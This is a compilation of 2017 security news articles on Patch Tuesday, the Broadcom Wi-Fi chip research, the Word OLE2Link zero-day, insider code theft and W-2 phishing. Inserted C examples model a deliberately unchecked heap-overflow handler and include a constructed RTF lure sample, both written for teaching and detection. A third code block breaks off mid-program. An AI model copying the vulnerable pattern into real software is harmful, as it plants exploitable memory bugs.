STE WILLIAMS

Cowardly Microsoft buries critical Hyper-V, WordPad, Office, Outlook, etc security patches in normal fixes

Microsoft today buried patches for critical security flaws, which attackers can exploit to hijack vulnerable computers, among a pile of minor bug fixes.

In a massive shakeup of its monthly Patch Tuesday updates, the Windows giant has done away with its easy-to-understand lists of security fixes published on TechNet – and instead scattered details of changes across a new portal: Microsoft’s Security Update Guide.

Billed by Redmond as “the authoritative source of information on our security updates,” the portal merely obfuscates discovered vulnerabilities and the fixes available for them. Rather than neatly split patches into bulletins as in previous months, Microsoft has dumped the lot into an unwieldy, buggy and confusing table that links out to a sprawl of advisories and patch installation instructions.

Punters and sysadmins unable to handle the overload of info are left with a fact-light summary of April’s patches – or a single bullet point buried at the end of a list of tweaks to, for instance, Windows 10.

Now, ordinary folk are probably happy with installing these changes as soon as possible, silently and automatically, without worrying about the nitty-gritty details of the fixed flaws. However, IT pros, and anyone else curious or who wants to test patches before deploying them, will have to fish through the portal’s table for details of individual updates.

Critical fixes hushed away

These updates include Hyper-V bugs that allow guest applications to hijack underlying host servers or siphon off information. And a remote-code execution bug in trusty WordPad that means opening a malicious file can trigger the installation of spyware or some other software nasty. And another remote-code execution hole in Outlook that means opening or previewing a booby-trapped email can lead to a malware infection.

Crucially, none of these programming blunders are mentioned in the PR-friendly summary put out today by Microsoft – a multibillion-dollar corporation that appears to care more about its image as a secure software vendor than coming clean on where its well-paid engineers cocked up. The summary lists “security updates” for “Microsoft Windows,” “Microsoft Office,” and “Internet Explorer” without version numbers or details.

The summary also fails to point out that three bugs – CVE-2017-0199 in Word and WordPad, CVE-2017-0210 in Internet Explorer, and CVE-2017-2605 in Office – are being actively attacked in the wild by miscreants and the Dridex malware. That latter bug has no patch, by the way: Microsoft just switched off an exploited PostScript filter by default.

“This new portal gives our customers a more relevant and customized user experience and is the single location for information on our security updates,” a Microsoft spokesperson told El Reg. But we already had a single relevant location for security advisories: TechNet bulletins. Now that useful service has been mothballed as Microsoft moves full swing into its patch bundle approach.

Amusingly, if you want a breakdown of the actual bugs fixed, you have to find the acknowledgements page, which lists each vulnerability patched along with a CVE number and the names of the researchers who reported the flaws. This list isn’t perfect, though: the bugs are listed in order of CVE, and not grouped by product or severity, so it’s rather all over the shop.

According to this month’s high-level overview, Redmond has made available patches to address security shortcomings in the following:

  • Edge
  • Internet Explorer
  • Windows
  • Office, Office Services, Office Web Apps
  • .NET framework
  • Flash Player (more on that below)
  • Visual Studio for Mac
  • Silverlight

These fixes can now be installed automatically via Windows Update. Reboot and you’re done. But wait, there are caveats. For example, the patch bundles KB4015549, KB4015546, KB4015550, KB4015547 that install the security fixes on Windows 7 and 8 have an unfortunate side-effect on computers using AMD Carrizo-based processors – they’ll be blocked from receiving further software updates until Microsoft sorts that out. Gulp!

“If the PC uses an AMD Carrizo DDR4 processor, installing this update will block downloading and installing future Windows updates. Microsoft is working on a resolution and will provide an update in an upcoming release,” we’re told.

How does that even happen?

Anyway, here are the gems we’ve found so far buried in today’s patches:

  • Flaws in Office/WordPad, Internet Explorer, and Office that are being targeted in the wild, according to the Zero Day Initiative.
  • Seven holes in Hyper-V: three allowing remote code execution (CVE-2017-0162, CVE-2017-0163, CVE-2017-0181), two permitting information disclosure (CVE-2017-0168, CVE-2017-0169), and two denial of service (CVE-2017-0182, CVE-2017-0186). These were found by the Microsoft Offensive Security Research Team, Felix Wilhelm, and Microsoft’s Vulnerabilities Mitigations team.
  • A remote-code execution flaw in Outlook (CVE-2017-0106) that can be triggered by simply opening or previewing a maliciously crafted message.
  • An information-leaking flaw (CVE-2013-6629) in libjpeg, a JPEG-processing library present on all supported versions of Windows and Windows Server.
  • A code-execution flaw in .NET (CVE-2017-0160) that requires local access on the target machine to exploit. The hole is present in all versions of .NET Framework from 2.0 SP2 through 4.7.
  • Three flaws in win32k.sys, two allowing information disclosure (CVE-2017-0058, CVE-2017-0188) and one allowing elevation of privilege (CVE-2017-0189). Malicious apps and logged-in users can exploit these to extract data from kernel memory or gain control of the system.
  • Microsoft Office flaws that include memory-corruption (CVE-2017-0194) bugs, cross-site-scripting with elevation of privilege (CVE-2017-0195), and a DLL-loading flaw (CVE-2017-0197). An update for Office for Mac addresses an HTML spoofing flaw (CVE-2017-0207).
  • Two memory-corruption flaws (CVE-2017-0200, CVE-2017-0205) were found in Microsoft Edge, while two memory-corruption flaws (CVE-2017-0202, CVE-2017-0158) and an elevation-of-privilege error (CVE-2017-0210) were spotted in Internet Explorer. The memory-corruption bugs can be exploited to run malicious code on a system by tricking a victim into simply opening a booby-trapped webpage.
  • Elevation-of-privilege flaws (CVE-2017-0155, CVE-2017-0156) in Windows Graphics and Windows Graphics Component, as well as an elevation of privilege vulnerability in Windows (CVE-2017-0165), allowing a malicious application or logged-in user to hijack a system, and an information-disclosure flaw (CVE-2017-0167) in Windows Kernel.
  • ADFS can be brute-forced (CVE-2017-0159) in Windows 10 and Windows Server to allow an account password to be guessed; Active Directory can be crashed (CVE-2017-0164) with a malicious search query; domain controllers can be targeted via an elevation-of-privilege flaw (CVE-2017-0166) in LDAP; and the Windows elevation-of-privilege bug (CVE-2017-0165) noted above lets a logged-in user gain admin-level privileges on Windows 10, 8.1 and Server 2012.
  • A denial-of-service flaw (CVE-2017-0191) can be abused by applications to crash Windows and Windows Server boxes, while Windows OLE has an elevation of privilege (CVE-2017-0211) flaw, and the Adobe Type Manager Font Driver can be exploited (CVE-2017-0192) to trigger information disclosure.
  • The Windows Scripting Engine sports a memory-corruption (CVE-2017-0201) vulnerability as well as an information-disclosure (CVE-2017-0208) flaw.

A bunch of these bugs were found by, among others, Google Project Zero, folks working with Trend Micro’s Zero Day Initiative, the Qihoo 360 Vulcan Team, Secunia Research at Flexera Software, McAfee, Hyundai, Securify B.V., FireEye, Optiv, SecuriTeam, and Palo Alto Networks.

Of course, Adobe, too

Meanwhile, Adobe stuck with its tried-and-true format of actually telling people what was getting fixed in this month’s Patch Tuesday. The April Flash Player update addresses seven remote code execution flaws for Windows, macOS, and Linux versions.

Adobe also addressed 47 CVE-listed flaws in Acrobat and Reader, two in Photoshop CC for Mac and Windows, two in the Creative Cloud Desktop Application for Windows, and one in Adobe Campaign.

The Flash Player update can be downloaded through Adobe or will be installed automatically in Chrome, Edge and newer versions of Internet Explorer. ®

Spot anything else weird and wonderful in today’s patches? Let us know!

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/11/patch_tuesday_mess/

Systems-on-a-chip are a huge, unaudited attack surface, says Project Zero’s Wi‑Fi attack man

The internal inter-chip communications of devices like smartphones are a “huge, mostly unaudited attack surface,” according to Gal Beniamini of Google’s Project Zero, in his promised follow-up to last week’s demonstration of how to attack Wi‑Fi chips over the air.

His April 4 “part one” prompted emergency patches from Apple and Google, new drivers from Broadcom and a lot of scratched heads about which other devices use the FullMAC system-on-chip (SoC) devices.

Beniamini calls for better memory isolation between SoCs and the host processors, along with exploit mitigations like stack cookies, to protect devices against Wi‑Fi-borne attacks.

Beniamini’s first post only got as far as remote code execution on the Wi‑Fi chip itself, but at the time he said there are paths from the SoC up to the application processor. He’s now detailed those issues in 8,300 words of gory detail here.

If you don’t have much time, Beniamini found both low-level (the easy way) and high-level (the hard way) communication paths that made the application processor attackable:

  • The “easy way” is to attack the communications channel that links the SoC to the application processor.
  • The “hard way” is to attack high-level messages the SoC passes to signal important Wi‑Fi events to the host (such as SSID discovery, Wi‑Fi power level and so on).

The Register is going to take the liberty of detailing the “easy way” first, reversing the order of Beniamini’s post.

“The utilisation of hardware components remains as it is, and is currently not mitigated against.”

The link from the SoC to the host

SoCs support a bunch of different upstream interfaces – Beniamini lists the mostly obsolete SDIO along with USB and PCIe. PCIe is the fastest, uses DMA (direct memory access) to talk to the processor, and is becoming the default in modern devices, so that’s the one Beniamini chose to attack.

After a fair bit of stack-trace work to untangle the protocols the Broadcom SoC uses to talk to the host, he found a spot where the SoC “managed to DMA into the physical address range containing the host’s kernel, without any interference” (among other things, this indicates either the absence of a system memory management unit, or SMMU, in front of the device, or one that is misconfigured).

Broadcom’s SoftMAC driver, brcmsmac, showed the researcher how to map out the SoC’s DMA access and identify which structures represent host-to-device and device-to-host transfers.

That provided a path to “hijack any kernel function with our own crafted data” – in other words, complete pwnage of the kernel.

The hard way

Beniamini’s “hard way,” actually his first line of research, was to look at how the SoC signals things like “SSID available” or Wi‑Fi power level to the host.

What he found is that such control messages all use the same EtherType, 0x886C, which encapsulates “information about firmware events which must be handled by the host’s driver.”

0x886C frames were unfiltered until last May, but there are two problems with this: if you pwn the SoC, you can revert that patch; and the WLC_E_PFN_SWC event that signals “significant Wi‑Fi change” (one of 144 possible, of which the Broadcom Android driver supports 35 – a genuinely huge attack surface) is still attackable.

Android’s April bulletin fixed five such holes that Beniamini discovered during his research.

The WLC_E_PFN_SWC work revealed an unchecked, untrusted array, meaning “an attacker with the ability to inject arbitrary event frames can specify a small total_count and a larger pkt_count, thereby triggering a simple kernel heap overflow.”

The reason Beniamini set aside this line of work is that while the vulnerability is genuine, it would have been “tedious” to write a reliable exploit (he should know, given the amount of work needed to get through to a kernel crash).
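To make the total_count/pkt_count bug concrete, here is an added example in C (not from the original article, and not Beniamini’s or Broadcom’s code): a model event handler that repeats the unsafe pattern, beside one that checks every attacker-controlled count before copying. Only the two field names come from the write-up; the wire layout, the 40-byte result record and the function names are assumptions made for this illustration.

```c
/*
 * Added example: a model of the WLC_E_PFN_SWC event-handling bug described
 * above, not Beniamini's or Broadcom's code. Only total_count and pkt_count
 * come from the write-up; the wire layout, the 40-byte result record and the
 * function names are assumptions made for this illustration.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout of the event payload that follows the 0x886C event header. */
struct swc_hdr {
    uint32_t total_count;   /* results the host is told to reserve room for */
    uint32_t pkt_count;     /* results actually carried in this frame */
};

struct swc_result {          /* assumed per-network record, 40 bytes */
    uint8_t ssid[32];
    uint8_t ssid_len;
    int8_t  rssi;
    uint8_t pad[6];
};

/* The unsafe pattern: the allocation is sized by one attacker-controlled field
 * and the copy by another, with nothing tying them together. Rather than
 * corrupt this process's heap, the function reports both sizes and returns 1
 * when the copy would run past the allocation (the heap overflow). */
int swc_handle_vulnerable(const uint8_t *payload, size_t len,
                          size_t *alloc_sz, size_t *copy_sz)
{
    struct swc_hdr h;
    if (len < sizeof h)
        return -1;
    memcpy(&h, payload, sizeof h);                 /* no unaligned loads */
    *alloc_sz = (size_t)h.total_count * sizeof(struct swc_result);
    *copy_sz  = (size_t)h.pkt_count   * sizeof(struct swc_result);
    /* driver shape: buf = kmalloc(alloc_sz); memcpy(buf, payload + 8, copy_sz); */
    return *copy_sz > *alloc_sz;
}

/* Hardened: every count is bounded against the allocation, the frame length
 * and size_t arithmetic before a single byte is copied. Returns 0 and a heap
 * array of *n_out results (caller frees) on success, -1 on a rejected frame. */
int swc_handle_hardened(const uint8_t *payload, size_t len,
                        struct swc_result **out, size_t *n_out)
{
    struct swc_hdr h;
    *out = NULL;
    *n_out = 0;
    if (len < sizeof h)
        return -1;
    memcpy(&h, payload, sizeof h);
    if (h.pkt_count > h.total_count)                          /* the missing check */
        return -1;
    if (h.total_count > SIZE_MAX / sizeof(struct swc_result)) /* size arithmetic */
        return -1;
    if ((size_t)h.pkt_count * sizeof(struct swc_result) > len - sizeof h)
        return -1;                                            /* frame too short */
    if (h.pkt_count == 0)
        return 0;
    struct swc_result *buf = calloc(h.total_count, sizeof *buf);
    if (!buf)
        return -1;
    memcpy(buf, payload + sizeof h, (size_t)h.pkt_count * sizeof *buf);
    *out = buf;
    *n_out = h.pkt_count;
    return 0;
}

/* Build a constructed event payload carrying `pkt` dummy results; returns its length. */
size_t build_swc_frame(uint32_t total, uint32_t pkt, uint8_t *buf, size_t cap)
{
    struct swc_hdr h = { total, pkt };
    size_t need = sizeof h + (size_t)pkt * sizeof(struct swc_result);
    if (need > cap)
        return 0;
    memcpy(buf, &h, sizeof h);
    memset(buf + sizeof h, 0x41, need - sizeof h);
    return need;
}

int main(void)
{
    uint8_t frame[512];
    size_t alloc_sz, copy_sz, cnt;
    struct swc_result *res;
    /* attacker's frame: reserve 2 results, send 4 */
    size_t n = build_swc_frame(2, 4, frame, sizeof frame);
    int overflow = swc_handle_vulnerable(frame, n, &alloc_sz, &copy_sz);
    printf("vulnerable: alloc %zu bytes, copy %zu bytes -> %s\n",
           alloc_sz, copy_sz, overflow ? "HEAP OVERFLOW" : "ok");
    printf("hardened:   %s\n",
           swc_handle_hardened(frame, n, &res, &cnt) == 0 ? "accepted" : "rejected");
    free(res);
    return 0;
}
```

The hardened version also rejects a frame whose declared pkt_count exceeds the bytes actually received, the other way an attacker-chosen count turns into an out-of-bounds read; both checks belong before the allocation, not after the copy.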

Beniamini’s how-to for pwning the Wi‑Fi processor is here, and our summary is here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/12/broadcom_soc_security_project_zero/

DARPA seeks SSITH lords to keep hardware from the Dark Side

America’s Defense Advanced Research Project Agency reckons too many vulnerabilities arise from hardware design errors, so it wants experts and boffins to propose better hardware-level security mechanisms.

Baked-in security is a vexed question, for good reason: recipe slips can also hard-wire vulnerabilities into a chip. For example, Intel’s Software Guard Extensions (SGX) is a favourite target for attack boffins crafting proofs-of-concept against the architecture.

Nonetheless, DARPA wants something better than “patch and pray” software security, so on April 21, it’s hosting a Proposers Day for its System Security Integrated Through Hardware and Firmware (SSITH – presumably the extra letter is there to avoid getting LucasFilm lawyers’ letters).

What it wants is “hardware design tools that provide security against hardware vulnerabilities”, for both Department of Defense and commercial systems.

They want designers to “limit the permitted hardware to states that are assured to be secure”, without sacrificing performance.

Of particular interest to the DARPA program are seven vulnerability classes from the Common Weakness Enumeration (CWE) that apply to hardware but are exploitable through software.

These are permission/privilege errors, buffer errors, resource management, information leakage, numeric errors, cryptographic errors, and code injection vulnerabilities. Together, DARPA reckons, hardware bugs of these types account for 40 per cent of currently known attacks.

The program is managed by Linton Salmon of DARPA’s Microsystems Technology Office, who in the agency’s announcement says software patches to hardware flaws aren’t enough.

The SSITH program wants to “remove those hardware vulnerabilities in ways that will disarm a large proportion of today’s software attacks.”

SSITH is a 39-month program covering “development and demonstration of hardware architectures”; and techniques to measure the security of new hardware designs, including tradeoffs in things like performance, power efficiency, and circuit area. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/12/darpa_ssith_program/

News in brief: Macron vows encryption crackdown; mobile calls on planes ruled out; AI wins at poker

Your daily round-up of some of the other stories in the news

Macron vows to crack down on encryption

French presidential candidate Emmanuel Macron (pictured) has become the latest politician to try and score political points by attacking encryption.

Speaking at the official launch of his presidential campaign in Paris, Macron said he would compel tech companies to provide access to encrypted messages exchanged between terror suspects on their platforms. He added: “Until now, big internet companies have refused to give their encryption keys or access to this content, saying that they have told their clients that their communications are encrypted. This situation is no longer acceptable.”

As we’ve discussed before on Naked Security, what Macron and UK home secretary Amber Rudd, among others, are calling for is theoretically possible if the organisations chose to abandon end-to-end encryption, but it’s not a workable idea, for many reasons.

Macron wants to have discussions with Google, Facebook, Apple and Twitter. We’ll be keeping an eye on what they say to Macron about his plan.

FCC abandons plans to allow cellphone calls on flights

Good news for passengers on American carriers who’d rather they couldn’t be reached by mobile phone when flying: the chairman of the FCC has said that he will throw out a 2013 proposal to allow calls on aircraft.

The proposal was made in 2013 to allow calls after concerns about interference endangering aircraft had been allayed thanks to technological advances: the ban on mobile phone calls while aloft was first imposed in 1991.

FCC chairman Ajit Pai said: “I stand with airline pilots, flight attendants and America’s flying public against the FCC’s ill-conceived 2013 plan to allow people to make cellphone calls on planes.”

Formally abandoning the plan, he added: “I do not believe that moving forward with this plan is in the public interest. Taking it off the table permanently will be a victory for Americans across the country who, like me, value a moment of quiet at 30,000 feet.”

AI thrashes humans in poker competition

Six human poker players have been trounced by AI in China, with the prize of $290,000 going to Lengpudashi, an updated version of the already human-beating Libratus AI system.

Carnegie Mellon’s AI system, which lives in a supercomputing centre in Pittsburgh, played 36,000 hands against the team of six humans including poker expert and venture capitalist Alan Du over five days on the Chinese island of Hainan, beating the humans “by a landslide”, reported Bloomberg.

Apparently Lengpudashi learned to bluff not from mimicking human players but from game theory. Noam Brown, a co-developer of Libratus, an earlier version of Lengpudashi, said: “Its theories were computed just from the rules of the game, not from analysing historical data.”


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/_LPPGfZ0dIs/

Microsoft patches Word zero-day booby-trap exploit

On Tuesday, Microsoft patched a previously undisclosed Word zero-day vulnerability that attackers have been using to install a variety of malware on victims’ computers.

The zero-day first came to light late last week. In its investigation, SophosLabs determined that exploits against the vulnerability had been happening for some time. SophosLabs principal researcher Gábor Szappanos estimated that most of the activity occurred in March-April 2017, but the first sample the lab located dates back to November 2016.

In its bulletin, Microsoft said the security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. Of the fix, the software giant said, simply:

This security update disables certain graphics filters.

The vulnerability

On unpatched systems, the vulnerability is triggered by opening a document that provokes a benign-looking download warning, followed by a download from a booby-trapped server that sends a document of a more dangerous sort.

In this case, the booby-trapped server sends back an HTML Application (HTA) file carrying an embedded script. Word accepts and runs the script without producing the warning you would expect to see.

It affects all current Office versions used on every Windows operating system, including the latest Office 2016 running on Windows 10. Attacks do not rely on enabled macros, so no warning for macro-laden documents will appear. The Dridex banking Trojan is among the malware being used in some of the exploits.

Details of the vulnerability were first released by McAfee and FireEye over the weekend. It’s the latest in a long line of bugs attackers can take advantage of through maliciously constructed files.

The United States Computer Emergency Readiness Team (US CERT), part of the Department of Homeland Security (DHS), issued its own advisory on the flaw:

The Microsoft OLE2Link object can open application data based on the server-provided MIME type, which can allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.

The exploits used in the wild have the following characteristics, CERT said:

  • The document that triggers the OLE2Link vulnerability is an RTF document that masquerades as a Microsoft Word DOC file.
  • The exploit connects to a remote server to obtain and execute an HTA file, which contains VBScript to be executed by the client.

This attack does depend on the user accepting a “load remote content” warning. Without that, the external content will not be pulled.
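As an added example (not Sophos, Microsoft or CERT code), the following C routine applies the two indicators CERT lists to a file before it reaches Word: does the body start with RTF magic while the name says .doc, and does the RTF carry an embedded OLE object? The sample bytes are constructed, and the use of the \objupdate control word (RTF’s instruction to refresh an object before display) as a marker for a link that fires on open is this example’s own assumption.

```c
/*
 * Added example, not Sophos, Microsoft or CERT code: a triage routine for the
 * lure described above, an RTF body delivered under a Word .doc name that
 * embeds an OLE link object. The \objupdate heuristic is this example's own
 * assumption about what marks such samples; the sample bytes are constructed.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum doc_kind { DOC_OLE2, DOC_OOXML_ZIP, DOC_RTF, DOC_UNKNOWN };

/* Decide the real container from magic bytes, ignoring the file name entirely. */
enum doc_kind sniff_kind(const uint8_t *buf, size_t len)
{
    static const uint8_t ole2_magic[8] = {0xD0,0xCF,0x11,0xE0,0xA1,0xB1,0x1A,0xE1};
    if (len >= 8 && memcmp(buf, ole2_magic, 8) == 0)   return DOC_OLE2;      /* legacy .doc */
    if (len >= 4 && memcmp(buf, "PK\x03\x04", 4) == 0) return DOC_OOXML_ZIP; /* .docx */
    if (len >= 5 && memcmp(buf, "{\\rtf", 5) == 0)     return DOC_RTF;
    return DOC_UNKNOWN;
}

/* Case-insensitive "ends with" for the file extension. */
static bool has_ext(const char *name, const char *ext)
{
    size_t n = strlen(name), e = strlen(ext);
    if (n < e)
        return false;
    for (size_t i = 0; i < e; i++) {
        char a = name[n - e + i];
        if (a >= 'A' && a <= 'Z')
            a = (char)(a + ('a' - 'A'));
        if (a != ext[i])
            return false;
    }
    return true;
}

/* Byte-exact substring search; RTF control words are case-sensitive. */
static bool contains(const uint8_t *buf, size_t len, const char *needle)
{
    size_t m = strlen(needle);
    if (m == 0 || len < m)
        return false;
    for (size_t i = 0; i + m <= len; i++)
        if (memcmp(buf + i, needle, m) == 0)
            return true;
    return false;
}

#define FLAG_EXT_MISMATCH 0x1u  /* .doc/.docx name but the body is RTF */
#define FLAG_OLE_OBJECT   0x2u  /* \object with embedded \objdata (an OLE object) */
#define FLAG_AUTO_UPDATE  0x4u  /* \objupdate: object refreshed when the document opens */

/* Returns a bitmask of the indicators found; 0 means nothing suspicious. */
unsigned triage_rtf_lure(const char *filename, const uint8_t *buf, size_t len)
{
    unsigned flags = 0;
    if (sniff_kind(buf, len) != DOC_RTF)
        return 0;
    if (has_ext(filename, ".doc") || has_ext(filename, ".docx"))
        flags |= FLAG_EXT_MISMATCH;
    if (contains(buf, len, "\\object") && contains(buf, len, "\\objdata"))
        flags |= FLAG_OLE_OBJECT;
    if (contains(buf, len, "\\objupdate"))
        flags |= FLAG_AUTO_UPDATE;
    return flags;
}

/* Constructed sample: RTF with an auto-updating OLE link (the objdata hex is a dummy). */
const char SAMPLE_LURE[] =
    "{\\rtf1\\ansi\\deff0 {\\fonttbl {\\f0 Times New Roman;}}\n"
    "{\\object\\objautlink\\objupdate\\rsltpict\\objw100\\objh100\n"
    "{\\*\\objclass Word.Document.8}{\\*\\objdata 01050000020000000b000000}}\n"
    "\\par Invoice attached.}";

/* Constructed sample: the first 16 bytes of a genuine legacy .doc (OLE2 compound file). */
const uint8_t SAMPLE_OLE2[16] = {0xD0,0xCF,0x11,0xE0,0xA1,0xB1,0x1A,0xE1, 0,0,0,0, 0,0,0,0};

int main(void)
{
    unsigned f = triage_rtf_lure("invoice.doc", (const uint8_t *)SAMPLE_LURE, sizeof SAMPLE_LURE - 1);
    printf("invoice.doc: flags=0x%x%s%s%s\n", f,
           f & FLAG_EXT_MISMATCH ? " ext-mismatch" : "",
           f & FLAG_OLE_OBJECT   ? " ole-object"   : "",
           f & FLAG_AUTO_UPDATE  ? " auto-update"  : "");
    printf("report.doc:  flags=0x%x\n", triage_rtf_lure("report.doc", SAMPLE_OLE2, sizeof SAMPLE_OLE2));
    return 0;
}
```

The extension mismatch alone is worth quarantining at a mail gateway: Word happily opens RTF under a .doc name, so nothing legitimate depends on that combination.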

The patch and other defenses

Sophos detects the first stage RTF downloader used in these exploits as Troj/DocDrop-TJ, and the second stage HTA code as Troj/DocDrop-SU. Sophos customers are protected.

The ultimate solution here is to install Microsoft’s patch as soon as possible. For additional defenses for this and other threats, we suggest the following:

  • If you receive a Word document by email and don’t know the person who sent it, DON’T OPEN IT.
  • It appears that attacks seen in the wild thus far can’t bypass Office Protected View, which means enabling it may provide some extra protection.
  • Use an anti-virus with an on-access scanner (also known as real-time protection). This can help you block malware of this type in a multi-layered defense, for example, by stopping the initial booby-trapped word file, preventing the Dridex download, blocking the downloaded malware from running, and finding and killing off the Dridex malware in memory.
  • Consider stricter email gateway settings. Some staff are more exposed to malware-sending crooks than others (such as the order processing department), and may benefit from more stringent precautions, rather than being inconvenienced by them.
  • Consider using Microsoft’s dedicated Word and Excel viewer programs to look at email attachments. Most documents will display just fine, but embedded macros aren’t supported and thus cannot run.
  • Never turn off security features because an email or document says so. Documents such as invoices, courier advisories and job applications should be legible without macros enabled.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/iQvZhBL9l6E/

Software dev cuffed for ‘nicking proprietary financial trading code’

FBI agents have collared a programmer accused of rifling through colleagues’ user accounts and stealing proprietary stock trading software.

Since 2010, Zhengquan Zhang was employed by a New York finance house that makes billions of dollars in trades a day via sophisticated algorithmic trading models and trading platforms. Investigators claim that between December last year and March this year, Zhang stole more than three million files from his employers, including source code for the trading system.

Zhang was arrested on Friday in California by the Feds, and was charged with the theft of trade secrets.

“As alleged, Zhengquan Zhang went to great lengths to surreptitiously steal confidential computer code from his employer,” said Acting US Attorney for the Southern District of New York, Joon Kim. “Zhang allegedly installed code designed to steal his employer’s proprietary information and illegally accessed colleagues’ computer systems to further his theft.”

Court documents [PDF] claim Zhang’s employers were tipped off when one of their quantitative analysts tried logging in to his work desktop from home on Saturday, March 25. However, the analyst wasn’t able to get in because someone else was using it. He found that the intruder had been going through his email archives.

The next day the analyst called the internal network security team, told them about the situation, and handed over the user ID of the intruder. The engineers allegedly identified the ID as belonging to Zhang, and promptly locked him out of the system.

On Monday morning, Zhang emailed the analyst apologizing for the intrusion, it is claimed. He said he was worried the company was being taken over and he was concerned about losing his job, thus he was trying to find out more information, the court was told.

“I’m still questioning myself why I did that,” Zhang allegedly wrote, before going on to explain he was able to get into the analyst’s remote desktop because he had modified a company web app to siphon off employees’ usernames and passwords, it is claimed. In a phone call, he also told the analyst he had entered several other accounts, it is alleged.

A subsequent investigation showed he’d done more than that, the court documents claim. Although Zhang was a software engineer at the firm, he wasn’t normally allowed to view or touch the trading platform’s source code. However, he managed to gain access to that source and exfiltrate a copy of it, doing so “thousands of times,” according to prosecutors. Specifically, Zhang is accused of:

  • Installing software to scan the network for encryption keys needed to access and build the trading source code.
  • Exfiltrating the source code and email inboxes to an outside software development website, starting in December 2016. This website isn’t named but it sounds like GitHub, GitLab, or similar.
  • Stashing three million internal files on the network before uploading the data to the outside website.
  • Smuggling the data out of the company via a backup proxy server.

When the company had seen enough evidence, it filed a complaint, and Zhang was cuffed and transferred to California.

Allegations … the prosecution’s case against Zhang

“Proprietary computer code may not be a tangible asset that people can observe, but it is indeed one of the most critical assets that companies possess,” said FBI assistant director in charge of the FBI’s New York Field Office, William Sweeney Jr.

“Significant investments are made to develop code, safeguard it and use it to generate revenue. The FBI is committed to enforcing laws that protect US companies from the theft of trade secrets.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/11/software_developer_cuffed_for_stealing_code/

Tax Season Surprise: W-2 Fraud

W-2 fraud used to target businesses exclusively but has now set its sights on many other sectors. Here’s what you can do to prevent it from happening to you.

Northwestern College, Groton School District in Connecticut, San Marcos City in Texas, Ellwood Thompson’s specialty grocery store, Meridian Health Services, Monarch Beverage — what do they have in common? Each has fallen victim to W-2 tax fraud in the last two months.

What was once a scam known for exclusively targeting the corporate world has expanded to other sectors, including school districts, tribal organizations, and nonprofits. W-2 fraudsters show no prejudice — regardless of geographic location, industry, and organization size, we’re seeing employees across the spectrum fall victim.

Because W-2 fraud doesn’t discriminate, it’s become a wildly successful phishing scheme. Here’s how it works: malicious actors spoof the CEO or president of a company and email an employee with financial responsibilities (think CFO or department head-level personnel) to request copies of all employees’ W-2 forms. The employee, believing that the boss needs this info, falls victim to the fake email, shares confidential information, and sets in motion a daisy chain of events that will damage the company and its employees.

W-2 fraud attacks are particularly dangerous because the fallout has long legs. IRS Commissioner John Koskinen wrote in a statement, “This is one of the most dangerous email phishing scams we’ve seen in a long time. It can result in the large-scale theft of sensitive data that criminals can use to commit various crimes, including filing fraudulent tax returns.”


Despite warnings from the IRS in early February, employees continue to fall for the bad guys’ social engineering ploys. In fact, the problem is growing in 2017. According to Tamara Powell, a program manager in the IRS wage and investment group, during the 2016 filing season, the IRS found that about 300,000 W-2s were compromised by W-2 scams. Compare that to what we’ve seen just this year: in January 2017 alone, the IRS found that 300,000 W-2s were compromised. No matter how you do the math, that’s an unbelievable year-over-year increase. A compilation of the victims is also available on DataBreaches.net. These are not only huge numbers but massive increases for a problem that’s mostly avoidable.

What to Do about W-2 Fraud
While organizations of all sizes and in all industries are at risk, the precautions are the same for everyone. Your IT team and internal security professionals will want to know if the endpoint solutions already in place will prevent W-2 fraud. They won’t. The good news is that your team won’t need to make another technology investment; it really comes down to educating employees on some basics to better protect your organization:

  • Notify the HR and accounting departments: Your finance and HR teams are the ones that are going to receive the fake emails, so before anything else, warn them there is a strain of CEO fraud asking for W-2s. What should they do if they get an email they think is a phishing email? Tell them to always verify requests like that using something other than email (phone, text, an in-person conversation). Warning these teams immediately may prevent a host of problems.
  • Encourage suspicion: As a security pro, you normally wouldn’t ask employees to actively be distrustful in their jobs, but when it comes to W-2 fraud, you want to encourage appropriate teams — finance, accounting, and HR — to run things through a sniff test. If someone in your organization receives an email asking about W-2 forms from literally anyone, alarms should sound. Encourage everyone to pick up the phone and verify that the email was truly sent by the CEO (or other appropriate party).
  • Educate: Read and circulate this link to the IRS site with more tax scams you need to watch out for.
  • Sound the alarm: If you receive a scam, report it. The IRS says organizations that receive a W-2 scam email should forward it to phishing@irs.gov and place “W2 Scam” in the subject line. Consider filing form 14039 and request an IP PIN from the government. Form 14039 requires you to state you believe you are likely to be a victim of identity fraud. Even if cybercriminals haven’t tried to file a bogus tax return in your name, virtually every American’s data has been stolen, which can lead to your identity being stolen.
  • Watch for follow-up: Cons keep getting bolder and have started combining W-2 fraud with CEO fraud. Tell your accounting and finance teams to watch for a “follow-up” email around the same time from the comptroller or CFO that asks them to conduct a wire transfer to a certain account. The steps are the same here — teach your staff to pick up the phone or have a face-to-face discussion to verify the request before acting on it.
  • Check configurations: A whopping 82% of email servers allow spoofed emails to pass through. Make sure you test this and correctly configure the email servers to not let spoofed domains through. Frameworks such as SPF, DMARC, and DKIM are useful to get this set up correctly.
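The last bullet is the one a machine can check for you. As an added example (not the article’s or KnowBe4’s code), this C program evaluates the SPF and DMARC TXT records a domain publishes and says whether a plain From: spoof of that domain would still be delivered by a receiver that honours DMARC. The records are constructed, and the bar it applies (a DMARC p=quarantine or p=reject policy at pct=100, with no SPF +all) is this example’s own.

```c
/*
 * Added example, not from the article or KnowBe4: evaluate the SPF and DMARC
 * TXT records a domain publishes and decide whether a plain From: spoof of
 * that domain would still be delivered. The records below are constructed;
 * the "resists spoofing" bar (DMARC enforced at 100%, no SPF +all) is ours.
 */
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum spf_all { SPF_NO_ALL, SPF_PASS_ALL, SPF_NEUTRAL_ALL, SPF_SOFTFAIL, SPF_HARDFAIL };
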